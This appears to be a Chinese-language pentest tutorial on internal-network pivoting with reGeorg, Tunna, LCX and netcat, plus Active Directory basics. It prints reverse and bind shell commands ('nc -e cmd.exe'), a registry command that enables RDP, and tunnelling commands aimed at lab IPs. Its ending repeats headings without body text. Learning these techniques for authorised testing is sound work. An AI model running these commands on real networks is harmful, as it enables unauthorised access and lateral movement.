内网渗透与转发代理技术详解<\/h1>

0x01 内网转发基础概念<\/h2>
内网转发是指在渗透测试过程中，通过端口转发或设置代理服务器，使攻击机能够访问和操作内网中其他不可直接访问的机器。<\/p>

端口映射<\/h3>

将内网(LAN)IP地址映射成公网(WAN)IP地址<\/li>
用户访问映射端口时，请求被转移到内网特定服务主机<\/li> <\/ul>
0x02 Socket协议与Socks协议<\/h2>
Socket协议<\/h3>
- 计算机之间通信的约定或方式<\/li>
- 通过Socket可以实现计算机间的数据收发<\/li> <\/ul>
  Socks协议<\/h3>
  - 会话层代理协议<\/li>
  - 设计目的：帮助授权用户突破防火墙限制<\/li>
  - 主要版本：Socks4和Socks5<\/li> <\/ul>
    协议过程<\/h4>
    
    客户端连接代理服务器并发送协议版本和支持的认证方式<\/li>
    代理服务器返回认证方式<\/li>
    若无需认证，客户端直接发起真实请求<\/li>
    代理服务器连接目标服务器<\/li>
    代理服务器转发客户端与目标服务器间的流量<\/li> <\/ol>
    0x03 代理类型<\/h2>
    正向代理<\/h3>
    
    客户端代理，服务端不知道实际请求的客户端<\/li>
    模式：Lhost → proxy → Rhost<\/li>
    用途：
    
    访问受限资源<\/li>
    缓存加速<\/li>
    隐藏用户信息<\/li> <\/ul> <\/li> <\/ul>
    反向代理<\/h3>
    
    服务器端代理，客户端不知道实际服务提供者<\/li>
    模式：Lhost ↔ proxy ↔ firewall ↔ Rhost<\/li>
    用途：
    
    保证内网安全<\/li>
    防止Web攻击<\/li>
    实现负载均衡<\/li> <\/ul> <\/li> <\/ul>
    0x04 内网代理转发技术<\/h2>
    实验环境<\/h3>
    
    攻击机器：192.168.13.128<\/li>
    外网服务器(含内网网卡)：192.168.13.129\/192.168.142.130<\/li>
    内网服务器：192.168.142.128<\/li> <\/ul>
    1. reGeorg + Proxifier 正向代理<\/h3>
    reGeorg特点<\/strong>：<\/p>
    
    reDuh的继承者<\/li>
    利用Socks5协议<\/li>
    支持PHP\/ASP\/JSP\/ASPX脚本<\/li> <\/ul>
    使用步骤<\/strong>：<\/p>
    
    上传reGeorg脚本到外网服务器<\/li>
    访问脚本验证运行状态("Georg says, 'All seems fine'")<\/li>
    本地监听端口：python2 reGeorgSocksProxy.py -p 8080 -u http:\/\/192.168.66.131\/tunnel.nosocket.php<\/code><\/li>
    配置Proxifier：添加本地代理服务器(监听端口)<\/li> 配置代理规则<\/li> 设置特定程序使用Socks5代理<\/li> <\/ul> <\/li> <\/ol> 2. Tunna 正向代理<\/h3> 功能<\/strong>：<\/p> 通过HTTP封装隧道通信任何TCP<\/li> 绕过防火墙网络限制<\/li> <\/ul> 常用参数<\/strong>：<\/p> -u<\/code> 远程代理脚本地址<\/li> -l<\/code> 本地监听端口<\/li> -r<\/code> 远程映射端口<\/li> -v<\/code> 输出详细数据<\/li> -a<\/code> 代理远程连接的主机地址<\/li> <\/ul> 使用步骤<\/strong>：<\/p> 在外网服务器WEB目录放入Tunna工具<\/li> 攻击机执行命令映射端口：python proxy.py -u http:\/\/192.168.13.129\/conn.php -l 5555 -a 192.168.142.128 -r 3389 -v<\/code><\/li> <\/ol> 3. LCX端口转发<\/h3> 功能<\/strong>：<\/p> 本地端口转发到远程主机端口<\/li> 本地端口转发到本地另一端口<\/li> 监听并转发<\/li> <\/ol> 使用场景<\/strong>：<\/p> 被控计算机处于内网时<\/li> 需要远程终端管理时<\/li> <\/ul> Windows用法<\/strong>：<\/p> lcx -<listen|tran|slave> <option> [-log logfile] -tran <等待连接的端口> <目标ip> <目标端口> (端口映射) -listen <监听slave请求的端口> <等待连接的端口> (端口转发) -slave <你的ip> <监听端口> <目标ip> <目标端口> (端口转发) <\/code><\/pre> 示例<\/strong>：<\/p> 外网中转服务器：lcx -listen 8888 10000<\/code><\/li> 内网机器：lcx -slave 192.168.142.130 8888 192.168.142.128 3389<\/code><\/li> 开启3389端口(Win7\/Win2003\/XP)：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server \/v fDenyTSConnections \/t REG_DWORD \/d 00000000 \/f<\/code><\/li> 连接：rdesktop 192.168.13.129:10000<\/code><\/li> <\/ol> 4. NC反弹CMDshell<\/h3> 正向连接<\/strong>：<\/p> 内网机器：nc -l -p 8888 -t -e cmd.exe<\/code><\/li> 公网机器：nc -nvv 192.168.142.128 8888<\/code><\/li> <\/ul> 反向连接<\/strong>：<\/p> 公网机器：nc -l -p 8888<\/code><\/li> 内网机器：nc -t -e cmd.exe 192.168.142.130 8888<\/code><\/li> <\/ul> 0x05 域基础知识<\/h2> 域(Domain)<\/h3> 将多台计算机逻辑组织到一起进行集中管理<\/li> Windows网络操作系统的逻辑组织单元<\/li> 安全边界，有自己的安全策略和信任关系<\/li> <\/ul> 域控(DC)<\/h3> 域中至少有一台域控制器<\/li> 保存整个域的用户账号和安全数据库<\/li> 活动目录(AD)的存储位置<\/li> <\/ul> 活动目录(AD)<\/h3> Windows Server中的集中式目录管理服务<\/li> 逻辑结构包含：域、域树、林和组织单元(OU)<\/li> <\/ul> 工作组(Work Group)<\/h3> 局域网中的计算机逻辑小组<\/li> "对等式"网络，计算机地位平等<\/li> 分散管理，每台计算机有自己的SAM数据库<\/li> <\/ul> 域与工作组的区别<\/h3> 工作组：逻辑集合，各自管理，需要被访问计算机验证<\/li> 域：安全边界集合，域内已建立信任关系，无需被访问计算机许可<\/li> <\/ul> 总结<\/h2> 本文详细介绍了内网渗透中的转发代理技术，包括：<\/p> 内网转发基础概念<\/li> Socket和Socks协议原理<\/li> 正向代理与反向代理的区别与应用<\/li> 多种内网代理转发工具的使用方法(reGeorg、Tunna、LCX、NC)<\/li> 域和工作组的基础知识<\/li> <\/ol> 这些技术是内网渗透测试中的核心技能，掌握它们对于安全测试人员至关重要。<\/p>

内网渗透与转发代理技术详解<\/h1>

0x01 内网转发基础概念<\/h2> 内网转发是指在渗透测试过程中，通过端口转发或设置代理服务器，使攻击机能够访问和操作内网中其他不可直接访问的机器。<\/p>

0x02 Socket协议与Socks协议<\/h2>

0x03 代理类型<\/h2>

0x04 内网代理转发技术<\/h2>

0x05 域基础知识<\/h2>

0x01 内网转发基础概念<\/h2>
内网转发是指在渗透测试过程中，通过端口转发或设置代理服务器，使攻击机能够访问和操作内网中其他不可直接访问的机器。<\/p>